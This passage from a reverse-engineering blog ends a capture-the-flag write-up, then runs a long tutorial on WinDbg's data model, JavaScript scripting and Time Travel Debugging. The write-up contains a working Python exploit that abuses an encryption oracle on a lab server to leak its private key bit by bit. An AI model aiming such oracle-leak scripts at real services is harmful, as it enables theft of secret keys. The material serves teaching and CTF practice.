The second small detail is that we technically don't know in which slot the private key is stored in on the remote server (remember, the shared library isn't provided to us). Which means we need to find that out somehow. Here is what we know:

  1. the key is stored at number_of_rows + 2,
  2. the size of the store is initialized to number_of_rows.

If we combine those two facts, we can try to read every single slot from the first one onward. The first time it stops with an 'out of range' exception, you have your number_of_rows :-)
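
Sketched with the same conventions as the script below (find_number_of_rows is a hypothetical helper, not code from the challenge):

def find_number_of_rows(c):
    # Probe 'Get Number' on increasing slots until the store complains.
    row = 0
    while True:
        recv_until(c, '8. Exit\n')
        c.send('1\n%d\n' % row)
        if 'out of range' in c.recv(1024):
            # The first rejected slot is the store size, i.e. number_of_rows.
            return row
        row += 1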

Oh yeah, by the way, remember this third stupid possibility I mentioned earlier? Using the private key slot as both the message and the key would basically end up... overwriting the private key itself, so not so useful.

Leaking it like it's hot

Here is my ugly python implementation of the attack:

# Axel '0vercl0k' Souchet - 3-March-2018
import sys
import socket

host = ('192.168.1.41', 31337)

def recv_until(c, s):
    buff = ''
    while True:
        b = c.recv(1)
        buff += b
        if s in buff:
            return buff

    return None

def addn(c, r_n, n):
    recv_until(c, '8. Exit\n')
    c.send('0\n%d\n%d\n' % (r_n, n))

def readn(c, r_n):
    recv_until(c, '8. Exit\n')
    c.send('1\n%d\n' % r_n)
    recv_until(c, 'Result is ')
    res = c.recv(1024).splitlines()
    return int(res[0], 10)

def main():
    r_key = 18
    r_oracle = 0
    # first step is to find out how many 0's the key starts with,
    # to do so we ask for an encryption where the key is the pkey,
    # and we encrypt until we cannot and we count the number of
    # 'Continue Encryption?'. 32 - this number should give us the
    # number of 0s
    n_zeros = 32
    c = socket.create_connection(host)
    addn(c, r_oracle, 1337)
    recv_until(c, '8. Exit\n')
    c.send('6\n%d\n%d\n' % (r_oracle, r_key))
    recv_until(c, 'Continue Encryption? (y/n)\n')
    for _ in range(32):
        c.send('y\n')
        n_zeros -= 1
        if 'Continue Encryption? (y/n)' not in c.recv(1024):
            break

    if n_zeros > 0:
        print 'Found', n_zeros, '0s at the start of the key'

    leaked_key = [ 0 ] * n_zeros
    v_oracle = 3
    # now we can go ahead and leak the key bit by bit (each byte is a bit)
    for i in range(32 - n_zeros):
        which_bit = len(leaked_key) + 1
        bit_idx = which_bit - n_zeros
        c = socket.create_connection(host)
        addn(c, r_oracle, v_oracle)
        # private key encryption
        recv_until(c, '8. Exit\n')
        c.send('6\n%d\n%d\n' % (r_oracle, r_key))
        for _ in range(bit_idx):
            recv_until(c, 'Continue Encryption? (y/n)\n')
            c.send('y\n')

        if which_bit < 32:
            recv_until(c, 'Continue Encryption? (y/n)\n')
            c.send('n\n')

        magic_number = 1
        for b in leaked_key[n_zeros :]:
            magic_number &= 0xffffffff
            magic_number *= magic_number
            if b == 1:
                magic_number *= v_oracle

        magic_number *= magic_number
        magic_number &= 0xffffffff
        n = readn(c, r_oracle)
        bit = 0 if magic_number == n else 1
        leaked_key.append(bit)
        c.close()
        print 'Leaked key: %08x\r' % reduce(lambda x, y: (x * 2) + y, leaked_key),

main()

Which should result in something like below:

leakit.gif

Conclusion

If you enjoyed this write-up you should also have a look at this post authored by the organizers (there's even source code!): beVX Conference Challenge. A funny twist for me was that the encryption and decryption routines called sleep to simulate a delay that could be timed over the network and used as a side-channel: every time there is a non-zero byte in the key, the message slot has to get read out of the store, which... calls into the decrypt function.

I thought this was pretty fun. Even if I had played the challenge in time, I probably wouldn't have noticed the delay as I would have been working with my own dummy implementations of encrypt and decrypt :-)

Totally unrelated, but I have also migrated the blog to pelican as I am basically done using octopress and ruby. I think I did an OK job at making it look not too shitty, but if you see something that looks ugly as hell feel free to ping me and I'll try my best to fix it up!

Last but not least, special thanks to my mates mongo and yrp604 for proofreading and edits :)

Debugger data model, Javascript & x64 exception handling

Introduction

The main goal of today's post is to show a bit more of what is now possible with the latest Windbg (currently branded "WinDbg Preview" in the Microsoft store) and the time travel debugging tools that Microsoft released a few months ago. When these finally got released, a bit after cppcon2017 this year, I expected a massive uptake from the security / reverse-engineering industry, with a bunch of posts, tools, scripts, etc. To my surprise, this has not happened yet, so I have waited patiently for my vacation to write a little something about it myself. So, here goes!

Obviously, one of the most noticeable changes in this debugger is the new UI... but this is not something we will talk about. The second big improvement is... a decent scripting engine! Until recently, I always had to use pyKD to write automation scripts. It has worked fairly well for years, but I'm glad to move away from it and embrace the new extension model provided by Windbg & Javascript (yes, you read that right). One of the biggest pain points I had to deal with in pyKD (aside from the installation process!) was that you had to evaluate many commands and then parse their outputs to extract the bits and pieces you needed. Thankfully, the new debugger data model solves this (or part of it anyway). The third big change is the integration of the time travel debugging (TTD) features discussed in this presentation: Time Travel Debugging: Root Causing Bugs in Commercial Scale Software.

The goal of this post is to leverage all the nifty stuff we will learn to enumerate x64 try/except handlers in Javascript.

So grab yourself a cup of fine coffee and read on :).


The debugger data model

Overview

What is being called the debugger data model is a hierarchy of objects (methods, properties, values) that are accessible both directly from the debugger's command window and through a Javascript API. The debugger exposes a bunch of information that it is responsible for: thread-related information, register values, stack trace information, etc. As an extension writer, you can go and expose your feature through the node of your choosing in the hierarchy. Once it is plugged into the model, it is available for consumption by another script, or through the debugger's command window.

model.png
One really interesting property of this exposed information is that it becomes queryable via operators heavily inspired by C#'s LINQ operators. For those who are unfamiliar with them, I would suggest looking at Basic LINQ query operations.

First query

Say you would like to find which module the current @rip is pointing into; you can easily express this through a query using LINQ operators and the data model:

0:001> dx @$curprocess.Modules.Where(p => @rip >= p.BaseAddress && @rip < (p.BaseAddress+p.Size))
@$curprocess.Modules.Where(p => @rip >= p.BaseAddress && @rip < (p.BaseAddress+p.Size))                
    [0x8]            : C:\WINDOWS\SYSTEM32\ntdll.dll

..and you can even check all the information related to this module by clicking on the DML [0x8] link:

0:001> dx -r1 @$curprocess.Modules.Where(p => @rip >= p.BaseAddress && @rip < (p.BaseAddress+p.Size))[8]
@$curprocess.Modules.Where(p => @rip >= p.BaseAddress && @rip < (p.BaseAddress+p.Size))[8]                 : C:\WINDOWS\SYSTEM32\ntdll.dll
    BaseAddress      : 0x7ffc985a0000
    Name             : C:\WINDOWS\SYSTEM32\ntdll.dll
    Size             : 0x1db000

In the previous two samples, there are several interesting points to highlight:

1) dx is the operator to access the data model which is not available through the ?? / ? operators

2) @$name is how you access a variable that you have defined during a debugging session. The debugger itself defines several variables right off the bat just to make querying the model easier: @$curprocess is equivalent to host.currentProcess in Javascript, @$cursession is host.currentSession, and @$curthread is host.currentThread. You can also define custom variables yourself, for example:

0:001> dx @$doare = "Diary of a reverse-engineer"
@$doare = "Diary of a reverse-engineer" : Diary of a reverse-engineer
    Length           : 0x1b

0:001> dx "Hello, " + @$doare
"Hello, " + @$doare : Hello, Diary of a reverse-engineer
    Length           : 0x22

0:001> ?? @$doare
Bad register error at '@$doare'

0:001> ? @$doare
Bad register error at '@$doare'

3) To query all the nodes in the @$curprocess hierarchy (if you want to wander through the data model you can just use dx Debugger and click through the DML links):

0:001> dx @$curprocess
@$curprocess                 : cmd.exe [Switch To]
    Name             : cmd.exe
    Id               : 0x874
    Threads         
    Modules         
    Environment

You can also check Debugger.State.DebuggerVariables where you can see the definitions for the variables we just mentioned:

0:001> dx Debugger.State.DebuggerVariables
Debugger.State.DebuggerVariables                
    cursession       : Live user mode: <Local>
    curprocess       : cmd.exe [Switch To]
    curthread        : ntdll!DbgUiRemoteBreakin (00007ffc`98675320)  [Switch To]
    scripts         
    scriptContents   : [object Object]
    vars            
    curstack        
    curframe         : ntdll!DbgBreakPoint [Switch To]

0:001> dx Debugger.State.DebuggerVariables.vars
Debugger.State.DebuggerVariables.vars                
    doare            : Diary of a reverse-engineer

4) Last but not least, most (all?) of the iterable objects can be queried through LINQ-style operators. If you've never used these it can be a bit weird at the beginning, but at some point it will click and then it is just goodness.

Here is the list of the currently available operators on iterable objects in the data model:

Aggregate        [Aggregate(AggregateMethod) | Aggregate(InitialSeed, AggregateMethod) | Aggregate(InitialSeed, AggregateMethod, ResultSelectorMethod) - LINQ equivalent method which iterates through the items in the given collection, running the aggregate method on each one and storing the returned result as the current aggregate value. Once the collection has been exhausted, the final accumulated value is returned. An optional result selector method can be specified which transforms the final accumulator value before returning it.]
All              [All(PredicateMethod) - LINQ equivalent method which returns whether all elements in the collection match a given predicate]
AllNonError      [AllNonError(PredicateMethod) - LINQ equivalent method which returns whether all elements in the collection match a given predicate. Errors are ignored if all non-error results match the predicate.]
Any              [Any(PredicateMethod) - LINQ equivalent method which returns whether any element in the collection matches a given predicate]
Average          [Average([ProjectionMethod]) - LINQ equivalent method which finds the average of all values in the enumeration. An optional projection method can be specified that transforms each value before the average is computed.]
Concat           [Concat(InnerCollection) - LINQ equivalent method which returns all elements from both collections, including duplicates.]
Contains         [Contains(Object, [ComparatorMethod]) - LINQ equivalent method which searches for the given element in the sequence using default comparator rules. An optional comparator method can be provided that will be called each time the element is compared against an entry in the sequence.]
Count            [Count() - LINQ equivalent method which returns the number of objects in the collection]
Distinct         [Distinct([ComparatorMethod]) - LINQ equivalent method which returns all distinct objects from the given collection, using default comparison rules. An optional comparator method can be provided to be called each time objects in the collection must be compared.]
Except           [Except(InnerCollection, [ComparatorMethod]) - LINQ equivalent method which returns all distinct objects in the given collection that are NOT found in the inner collection. An optional comparator method can also be specified.]
First            [First([PredicateMethod]) - LINQ equivalent method which returns the first element in the collection or the first which matches an optional predicate]
FirstNonError    [FirstNonError([PredicateMethod]) - LINQ equivalent method which returns the first element in the collection or the first which matches an optional predicate. Any errors encountered are ignored if a valid element is found.]
Flatten          [Flatten([KeyProjectorMethod]) - Method which flattens a tree of collections (or a tree of keys that project to collections via an optional projector method) into a single collection]
GroupBy          [GroupBy(KeyProjectorMethod, [KeyComparatorMethod]) - LINQ equivalent method which groups the collection by unique keys defined via a key projector and optional key comparator]
Intersect        [Intersect(InnerCollection, [ComparatorMethod]) - LINQ equivalent method which returns all distinct objects in the given collection that are also found in the inner collection. An optional comparator method can also be specified.]
Join             [Join(InnerCollection, Outer key selector method, Inner key selector method, Result selector method, [ComparatorMethod]) - LINQ equivalent method which projects a key for each element of the outer collection and each element of the inner collection using the methods provided. If the projected keys from both these elements match, then the result selector method is called with both those values and its output is returned to the user. An optional comparator method can also be specified.]
Last             [Last([PredicateMethod]) - LINQ equivalent method which returns the last element in the collection or the last which matches an optional predicate]
LastNonError     [LastNonError([PredicateMethod]) - LINQ equivalent method which returns the last element in the collection or the last which matches an optional predicate. Any errors are ignored.]
Max              [Max([ProjectionMethod]) - LINQ equivalent method which returns the maximum element using standard comparison rules. An optional projection method can be specified to project the elements of a sequence before comparing them with each other.]
Min              [Min([ProjectionMethod]) - LINQ equivalent method which returns the minimum element using standard comparison rules. An optional projection method can be specified to project the elements of a sequence before comparing them with each other.]
OrderBy          [OrderBy(KeyProjectorMethod, [KeyComparatorMethod]) - LINQ equivalent method which orders the collection via a key projector and optional key comparator in ascending order]
OrderByDescending [OrderByDescending(KeyProjectorMethod, [KeyComparatorMethod]) - LINQ equivalent method which orders the collection via a key projector and optional key comparator in descending order]
Reverse          [Reverse() - LINQ equivalent method which returns the reverse of the supplied enumeration.]
Select           [Select(ProjectionMethod) - LINQ equivalent method which projects the collection to a new collection via calling a projection method on every element]
SequenceEqual    [SequenceEqual(InnerCollection, [ComparatorMethod]) - LINQ equivalent method which goes through the outer and inner collections and makes sure that they are equal (incl. sequence length). An optional comparator can be specified.]
Single           [Single([PredicateMethod]) - LINQ equivalent method which returns the only element in a list, or, if a predicate was specified, the only element that satisfies the predicate. If there are multiple elements that match the criteria, an error is returned.]
Skip             [Skip(Count) - LINQ equivalent method which skips the specified number of elements in the collection and returns all the rest.]
SkipWhile        [SkipWhile(PredicateMethod) - LINQ equivalent method which runs the predicate for each element and skips it as long as it keeps returning true. Once the predicate fails, the rest of the collection is returned.]
Sum              [Sum([ProjectionMethod]) - LINQ equivalent method which sums all the elements in the collection. Can optionally specify a projector method to transform the elements before summation occurs.]
Take             [Take(Count) - LINQ equivalent method which takes the specified number of elements from the collection.]
TakeWhile        [TakeWhile(PredicateMethod) - LINQ equivalent method which runs the predicate for each element and returns it only if the result is successful. Once the predicate fails, no more elements will be taken.]
Union            [Union(InnerCollection, [ComparatorMethod]) - LINQ equivalent method which returns all distinct objects from the given and inner collection. An optional comparator method can also be specified.]
Where            [Where(FilterMethod) - LINQ equivalent method which filters elements in the collection according to when a filter method returns true for a given element]
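
As a quick illustration of chaining those, here is the kind of hypothetical query you can write (it should return the name of the biggest module loaded in the process):

0:001> dx @$curprocess.Modules.OrderByDescending(m => m.Size).Select(m => m.Name).First()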

Now you may be wondering whether the model is available with every possible configuration of Windbg. By configuration I mean that you can use the debugger live in user-mode attached to a process, offline looking at a crash-dump of a process, live in kernel-mode, offline looking at a system crash-dump, or offline looking at a TTD trace.

And yes, the model is accessible with all the previous configurations, and this is awesome. Overall, this allows you to write very generic scripts, as long as the information you are mining / exposing is not tied to a specific configuration.

Scripting the model in Javascript

As we described a bit earlier, you can now programmatically access everything that is exposed through the model via Javascript. No more eval or string parsing to extract the information you want; just go find the node exposing what you are after. If this node doesn't exist, add your own to expose the information you want :)

Javascript integers and Int64

The first thing you need to be aware of with Javascript is the fact that integers are encoded in C doubles... which means your integers are stored in 53 bits. This is definitely a problem as most of the data we deal with are 64 bit integers. In order to address this problem, Windbg exposes a native type to Javascript that is able to store 64 bit integers. The type is called Int64, and most (all?) of the integer values available in the data model come as Int64 instances. This type exposes various methods to perform arithmetic and binary operations (if you use the native operators, the Int64 gets converted back to a Javascript integer and throws if data is lost during the conversion; cf Auto-conversion). It takes a bit of time to get used to, but it feels natural pretty quickly. Note that the Frida framework exposes a very similar type to address the same issue, so it will be even easier for you if you have played with Frida in the past!

You can construct an Int64 directly from a native Javascript integer (so at most 53 bits long as described above), or you can use the host.parseInt64 method that takes a string as input. The other very important method you are going to need is Int64.compareTo, which returns 1 if the instance is bigger than the argument, 0 if equal, and -1 if smaller. The below script shows a summary of the points we touched on:

// Int64.js
"use strict";

let logln = function (e) {
    host.diagnostics.debugLog(e + '\n');
}

function invokeScript() {
    let a = host.Int64(1337);
    let aplusone = a + 1;
    // 53a
    logln(aplusone.toString(16));
    let b = host.parseInt64('0xdeadbeefbaadc0de', 16);
    let bplusone = b.add(1);
    // 0xdeadbeefbaadc0df
    logln(bplusone.toString(16));
    let bplusonenothrow = b.convertToNumber() + 1;
    // 16045690984229355000
    logln(bplusonenothrow);
    try {
        let bplusonethrow = b + 1;
    } catch(e) {
        // Error: 64 bit value loses precision on conversion to number
        logln(e);
    }
    // 1
    logln(a.compareTo(1));
    // 0
    logln(a.compareTo(1337));
    // -1
    logln(a.compareTo(1338));
}

For more information I would recommend looking at this page JavaScript Debugger Scripting.

Accessing CPU registers

Registers are accessible through the host.currentThread.Registers object. You can access the classical GPRs in the User node, but you can also access the xmm/ymm registers via the SIMD and Floating Point nodes. As you may have guessed, the registers are all instances of the Int64 type we just talked about.
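
As a quick illustration, here is a minimal sketch dumping a few GPRs (assuming an x64 target; on x86 you would use the 32-bit register names):

//registers.js
"use strict";

let logln = function (e) {
    host.diagnostics.debugLog(e + '\n');
}

function invokeScript() {
    let Regs = host.currentThread.Registers.User;
    // Every register is an Int64 instance, hence toString(16).
    logln('rip: ' + Regs.rip.toString(16));
    logln('rsp: ' + Regs.rsp.toString(16));
    logln('rax: ' + Regs.rax.toString(16));
}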

Reading memory

You can read raw memory via the host.memory.readMemoryValues function. It allows you to read memory as an array of items whose size you can specify. You can also use host.memory.readString and host.memory.readWideString for reading (narrow/wide) strings directly from memory.

//readmemory.js
"use strict";

let logln = function (e) {
    host.diagnostics.debugLog(e + '\n');
}

function read_u64(addr) {
    return host.memory.readMemoryValues(addr, 1, 8)[0];
}

function invokeScript() {
    let Regs = host.currentThread.Registers.User;
    let a = read_u64(Regs.rsp);
    logln(a.toString(16));
    let WideStr = host.currentProcess.Environment.EnvironmentBlock.ProcessParameters.ImagePathName.Buffer;
    logln(host.memory.readWideString(WideStr));
    let WideStrAddress = WideStr.address;
    logln(host.memory.readWideString(WideStrAddress));
}

Executing / evaluating commands

Even though a bunch of data is accessible programmatically via the data model, not everything is exposed in the model today. For example, you cannot access through the Frame model object the same amount of information that kp shows you. Specifically, the addresses of the frames and the saved return addresses are unfortunately not currently available in the object :-( As a result, being able to evaluate commands can still be important.

The ExecuteCommand API evaluates a command and returns its output as an iterable collection of lines:

//eval.js
"use strict";

let logln = function (e) {
    host.diagnostics.debugLog(e + '\n');
}

function invokeScript() {
    let Control = host.namespace.Debugger.Utility.Control;
    for(let Line of Control.ExecuteCommand('kp')) {
        logln('Line: ' + Line);
    }
}

There is at least one pitfall with this function to be aware of: the API executes until the command completes. So, if you use ExecuteCommand to execute, let's say, gc, the call will return only when you encounter some sort of break. If you never encounter a break, the call will never return.

Setting breakpoints

Setting breakpoints is basically handled by three different APIs: SetBreakpointAtSourceLocation, SetBreakpointAtOffset, and SetBreakpointForReadWrite. The names are pretty self-explanatory so I will not spend much time describing them. Unfortunately, as far as I can tell there is no easy way to bind a breakpoint to a Javascript function that handles it when it is hit. The objects returned by these APIs have a Command field you can use to trigger a command when the breakpoint fires, as opposed to a function invocation. In essence, it is pretty much the same as when you do bp foo "command".

Hopefully these APIs will become more powerful and better suited to scripting in future versions, with the possibility of invoking a Javascript function when the breakpoint triggers, passing it an object describing why and where it triggered, etc.

Here is a simple example:

//breakpoint.js
"use strict";

let logln = function (e) {
    host.diagnostics.debugLog(e + '\n');
}

function handle_bp() {
    let Regs = host.currentThread.Registers.User;
    let Args = [ Regs.rcx, Regs.rdx, Regs.r8 ];
    let ArgsS = Args.map(c => c.toString(16));
    let HeapHandle = ArgsS[0];
    let Flags = ArgsS[1];
    let Size = ArgsS[2];
    logln('RtlAllocateHeap: HeapHandle: ' + HeapHandle + ', Flags: ' + Flags + ', Size: ' + Size);
}

function invokeScript() {
    let Control = host.namespace.Debugger.Utility.Control;
    let Regs = host.currentThread.Registers.User;
    let CurrentProcess = host.currentProcess;
    let BreakpointAlreadySet = CurrentProcess.Debug.Breakpoints.Any(
        c => c.OffsetExpression == 'ntdll!RtlAllocateHeap+0x0'
    );

    if(BreakpointAlreadySet == false) {
        let Bp = Control.SetBreakpointAtOffset('RtlAllocateHeap', 0, 'ntdll');
        Bp.Command = '.echo doare; dx @$scriptContents.handle_bp(); gc';
    } else {
        logln('Breakpoint already set.');
    }
    logln('Press "g" to run the target.');
    // let Lines = Control.ExecuteCommand('gc');
    // for(let Line of Lines) {
    //     logln('Line: ' + Line);
    // }
}

This gives:

0:000>
Press "g" to run the target.
0:000> g-
doare
RtlAllocateHeap: HeapHandle: 0x21b5dcd0000, Flags: 0x140000, Size: 0x82
@$scriptContents.handle_bp()
doare
RtlAllocateHeap: HeapHandle: 0x21b5dcd0000, Flags: 0x140000, Size: 0x9a
@$scriptContents.handle_bp()
doare
RtlAllocateHeap: HeapHandle: 0x21b5dcd0000, Flags: 0x140000, Size: 0x40
@$scriptContents.handle_bp()
doare
RtlAllocateHeap: HeapHandle: 0x21b5dcd0000, Flags: 0x140000, Size: 0x38
@$scriptContents.handle_bp()
doare
RtlAllocateHeap: HeapHandle: 0x21b5dcd0000, Flags: 0x0, Size: 0x48
@$scriptContents.handle_bp()
...

Now, I find this interface not well suited for scenarios where you need a breakpoint that just dumps stuff and keeps going, but hopefully this will improve in the future. Let's say you have a function and you're interested in dumping its arguments/state every time it gets called. If you attempt to do this with the above code, every time the breakpoint is hit the debugger will execute your callback and stop; at this point you have to tell it to keep executing. (Also, feel free to uncomment the last lines of the script to see what happens if you ExecuteCommand('gc') :-).)

One way I found around this limitation is to use evaluation and the bp command:

//breakpoint2.js
"use strict";

let logln = function (e) {
    host.diagnostics.debugLog(e + '\n');
}

function handle_bp() {
    let Regs = host.currentThread.Registers.User;
    let Args = [Regs.rcx, Regs.rdx, Regs.r8];
    let ArgsS = Args.map(c => c.toString(16));
    let HeapHandle = ArgsS[0];
    let Flags = ArgsS[1];
    let Size = ArgsS[2];
    logln('RtlAllocateHeap: HeapHandle: ' + HeapHandle + ', Flags: ' + Flags + ', Size: ' + Size);
    if(Args[2].compareTo(0x100) > 0) {
        // stop execution if the allocation size is bigger than 0x100
        return true;
    }
    // keep the execution going if it's a small size
    return false;
}

function invokeScript() {
    let Control = host.namespace.Debugger.Utility.Control;
    let Regs = host.currentThread.Registers.User;
    let CurrentProcess = host.currentProcess;
    let HeapAlloc = host.getModuleSymbolAddress('ntdll', 'RtlAllocateHeap');
    let BreakpointAlreadySet = CurrentProcess.Debug.Breakpoints.Any(
        c => c.Address == HeapAlloc
    );
    if(BreakpointAlreadySet == false) {
        logln('RtlAllocateHeap @ ' + HeapAlloc.toString(16));
        Control.ExecuteCommand('bp /w "@$scriptContents.handle_bp()" ' + HeapAlloc.toString(16));
    } else {
        logln('Breakpoint already set.');
    }
    logln('Press "g" to run the target.');
}

Which gives this output:

0:000>
RtlAllocateHeap @ 0x7fffc07587a0
Press "g" to run the target.
0:000> g
RtlAllocateHeap: HeapHandle: 0x21b5dcd0000, Flags: 0x0, Size: 0x48
RtlAllocateHeap: HeapHandle: 0x21b5dcd0000, Flags: 0x140000, Size: 0x38
...
RtlAllocateHeap: HeapHandle: 0x21b5dcd0000, Flags: 0x140000, Size: 0x34a
Breakpoint 0 hit
Time Travel Position: 2A51:314
ntdll!RtlAllocateHeap:
00007fff`c07587a0 48895c2408      mov     qword ptr [rsp+8],rbx ss:000000b8`7f39e9a0=000000b87f39e9b0

Of course, yet another way of approaching this problem would be to wrap the script invocation into the command of a breakpoint like this:

bp ntdll!RtlAllocateHeap ".scriptrun c:\foo\script.js"

TTD

For those who are not familiar with Microsoft’s "Time Travel Debugging" toolset, in a nutshell it allows you to record the execution of a process. Once the recording is done, you end up with a trace file written to disk that you can load into the debugger to replay what you just recorded -- a bit like a camera / VCR. If you want to learn more about it, I would highly recommend checking out this presentation: Time Travel Debugging: root causing bugs in commercial scale software.

Even though I won't cover how to record and replay a TTD trace in this article, I just wanted to show you how powerful such features can be once coupled with the data model. As you have probably realized by now, the data model is all about extensibility: when you have a trace loaded in the debugger, you can access TTD-specific features via the model. This section tries to describe them.

TTD.Calls

The first feature I wanted to talk about is TTD.Calls. This API goes through an entire execution trace and finds every unique point in the trace where a given API has been called.

0:000> dx -v @$cursession.TTD
@$cursession.TTD                 : [object Object]
    Calls            [Returns call information from the trace for the specified set of symbols: TTD.Calls("module!symbol1", "module!symbol2", ...)]

For each of those points, you have an object describing the call: time travel position (that you can travel to: see TimeStart and TimeEnd below), parameters (leveraging symbols if you have any to know how many parameters the API expects), return value, the thread id, etc.

Here is what it looks like:

0:000> dx -r1 @$cursession.TTD.Calls("ntdll!RtlAllocateHeap").Count()
@$cursession.TTD.Calls("ntdll!RtlAllocateHeap").Count() : 0x267

0:000> dx @$cursession.TTD.Calls("ntdll!RtlAllocateHeap").First()
@$cursession.TTD.Calls("ntdll!RtlAllocateHeap").First()                
    EventType        : Call
    ThreadId         : 0x1004
    UniqueThreadId   : 0x6
    TimeStart        : 12C1:265 [Time Travel]
    TimeEnd          : 12DE:DC [Time Travel]
    Function         : ntdll!RtlAllocateHeap
    FunctionAddress  : 0x7fffc07587a0
    ReturnAddress    : 0x7fffbdcd9cc1
    ReturnValue      : 0x21b5df71980
    Parameters      

0:000> dx -r1 @$cursession.TTD.Calls("ntdll!RtlAllocateHeap").First().Parameters
@$cursession.TTD.Calls("ntdll!RtlAllocateHeap").First().Parameters                
    [0x0]            : 0x21b5df70000
    [0x1]            : 0x8
    [0x2]            : 0x2d8
    [0x3]            : 0x57

Obviously, the collection returned by TTD.Calls can be queried via the same LINQ-like operators we mentioned earlier which is awesome. As an example, asking the following question has never been easier: "How many times did the allocator fail to allocate memory?":

0:000> dx @$Calls=@$cursession.TTD.Calls("ntdll!RtlAllocateHeap").Where(c => c.ReturnValue == 0)
@$Calls=@$cursession.TTD.Calls("ntdll!RtlAllocateHeap").Where(c => c.ReturnValue == 0)                

0:000> dx @$Calls.Count()
@$Calls.Count()  : 0x0

Note that because the API has been designed in a way that abstracts away ABI-specific details, your query / code works on both x86 & x64 seamlessly. Another important point is that this is much faster than setting a breakpoint manually and running the trace forward to collect the information yourself.
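
The same query can also be written from Javascript. Here is a minimal sketch (assuming a TTD trace is loaded) that mirrors the above dx query:

//ttdcalls.js
"use strict";

let logln = function (e) {
    host.diagnostics.debugLog(e + '\n');
}

function invokeScript() {
    let Calls = host.currentSession.TTD.Calls('ntdll!RtlAllocateHeap');
    // ReturnValue is an Int64, so compareTo is the safe way to test it.
    let Failed = Calls.Where(c => c.ReturnValue.compareTo(0) == 0);
    logln('Total calls: ' + Calls.Count());
    logln('Failed calls: ' + Failed.Count());
}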

TTD.Memory

The other very powerful feature, announced fairly recently in version 1.1712.15003, is TTD.Memory. A bit like TTD.Calls, this feature lets you find every memory access that happened on a specific memory range during an execution trace. And again, it returns a nice object with all the information you could potentially be interested in (time travel positions, access type, the instruction pointer address, the address of the memory accessed, etc.):

0:000> dx @$Accesses[0]
@$Accesses[0]                
    EventType        : MemoryAccess
    ThreadId         : 0x15e8
    UniqueThreadId   : 0x3
    TimeStart        : F44:2 [Time Travel]
    TimeEnd          : F44:2 [Time Travel]
    AccessType       : Write
    IP               : 0x7fffc07649bf
    Address          : 0xb87f67fa70
    Size             : 0x4
    Value            : 0x0

Here is how you would ask it to find every piece of code that write-accessed the TEB region of the current thread (read and execute are other valid types of access you can query for and combine):

0:001> ? @$teb
Evaluate expression: 792409825280 = 000000b8`7f4e6000

0:001> ?? sizeof(_TEB)
unsigned int64 0x1838

0:001> dx @$Accesses=@$cursession.TTD.Memory(0x000000b8`7f4e6000, 0x000000b8`7f4e6000+0x1838, "w")
@$Accesses=@$cursession.TTD.Memory(0x000000b8`7f4e6000, 0x000000b8`7f4e6000+0x1838, "w")                

0:001> dx @$Accesses[0]
@$Accesses[0]                
    EventType        : MemoryAccess
    ThreadId         : 0x15e8
    UniqueThreadId   : 0x3
    TimeStart        : F79:1B [Time Travel]
    TimeEnd          : F79:1B [Time Travel]
    AccessType       : Write
    IP               : 0x7fffc0761bd0
    Address          : 0xb87f4e7710
    Size             : 0x10
    Value            : 0x0

The other beauty of it is that you can travel to the position ID and find out what happened:

0:001> !tt F79:1B
Setting position: F79:1B
(1cfc.15e8): Break instruction exception - code 80000003 (first/second chance not available)
Time Travel Position: F79:1B
ntdll!TppWorkCallbackPrologRelease+0x100:
00007fff`c0761bd0 f30f7f8010170000 movdqu  xmmword ptr [rax+1710h],xmm0 ds:000000b8`7f4e7710=00000000000000000000000000000000

0:001> dt _TEB ActivityId
ntdll!_TEB
    +0x1710 ActivityId : _GUID

In the above example, you can see that the TppWorkCallbackPrologRelease function is zeroing the ActivityId GUID of the current TEB - magical.
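
As with TTD.Calls, this feature is reachable from Javascript as well. Here is a minimal sketch (assuming a TTD trace is loaded and hard-coding the sizeof(_TEB) value of 0x1838 we dumped above) replicating the TEB query:

//ttdmemory.js
"use strict";

let logln = function (e) {
    host.diagnostics.debugLog(e + '\n');
}

function invokeScript() {
    // The address property gives us the TEB base as an Int64.
    let Teb = host.currentThread.Environment.EnvironmentBlock.address;
    let Accesses = host.currentSession.TTD.Memory(Teb, Teb.add(0x1838), 'w');
    for (let Access of Accesses) {
        logln(Access.TimeStart + ': ' + Access.IP.toString(16) + ' wrote ' +
              Access.Size + ' bytes @ ' + Access.Address.toString(16));
    }
}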

TTD.Utility.GetHeapAddress

The two previous features were mostly building blocks; this utility consumes the TTD.Calls API in order to show the lifetime of a heap chunk in a trace session. What does that mean exactly? Well, the utility looks for every heap related operation that happened on a chunk (start address, size) and shows them to you.

This is extremely useful when debugging or root-causing issues, and here is what it looks like on a dummy trace:

0:000> dx -g @$cursession.TTD.Utility.GetHeapAddress(0x21b5dce40a0)
========================================================================================================================================
=                           = Action   = Heap             = Address          = Size    = Flags  = (+) TimeStart = (+) TimeEnd = Result =
========================================================================================================================================
= [0x59] : [object Object]  - Alloc    - 0x21b5dcd0000    - 0x21b5dce4030    - 0xaa    - 0x8    - ED:7D7        - EF:7D       -        =
= [0x6b] : [object Object]  - Alloc    - 0x21b5dcd0000    - 0x21b5dce40a0    - 0xaa    - 0x8    - 105:D9        - 107:7D      -        =
= [0x6c] : [object Object]  - Free     - 0x21b5dcd0000    - 0x21b5dce40a0    -         - 0x0    - 107:8D        - 109:1D      - 0x1    =
= [0x276] : [object Object] - Alloc    - 0x21b5dcd0000    - 0x21b5dce4030    - 0x98    - 0x0    - E59:3A7       - E5A:8E      -        =
========================================================================================================================================

The attentive reader has probably noticed something unexpected with entries 0x59 and 0x276, where we see two different allocations of the same chunk without any free in between. The answer lies in the way the GetHeapAddress function is implemented (check out the TTD\Analyzers\HeapAnalysis.js file): it basically looks for every heap related operation and only shows you the ones where the range address + size contains the argument you passed. In this example we gave the function the address 0x21b5dce40a0; entry 0x59 is an allocation and 0x21b5dce40a0 is in the range 0x21b5dce4030 + 0xAA, so we display it. Now, a free does not know the size of the chunk; the only thing it knows is the base pointer. So if there is a free of 0x21b5dce4030, the utility just does not display it to us, which explains how we can see two allocations of the same chunk without a free in the time frame ED:7D7 to E59:3A7.

We can even go ahead and prove this by finding the free by running the below command:

0:000> dx -g @$cursession.TTD.Utility.GetHeapAddress(0x21b5dce4030).Where(p => p.Address == 0x21b5dce4030)
========================================================================================================================================
=                           = Action   = Heap             = Address          = Size    = Flags  = (+) TimeStart = (+) TimeEnd = Result =
========================================================================================================================================
= [0x61] : [object Object]  - Alloc    - 0x21b5dcd0000    - 0x21b5dce4030    - 0xaa    - 0x8    - ED:7D7        - EF:7D       -        =
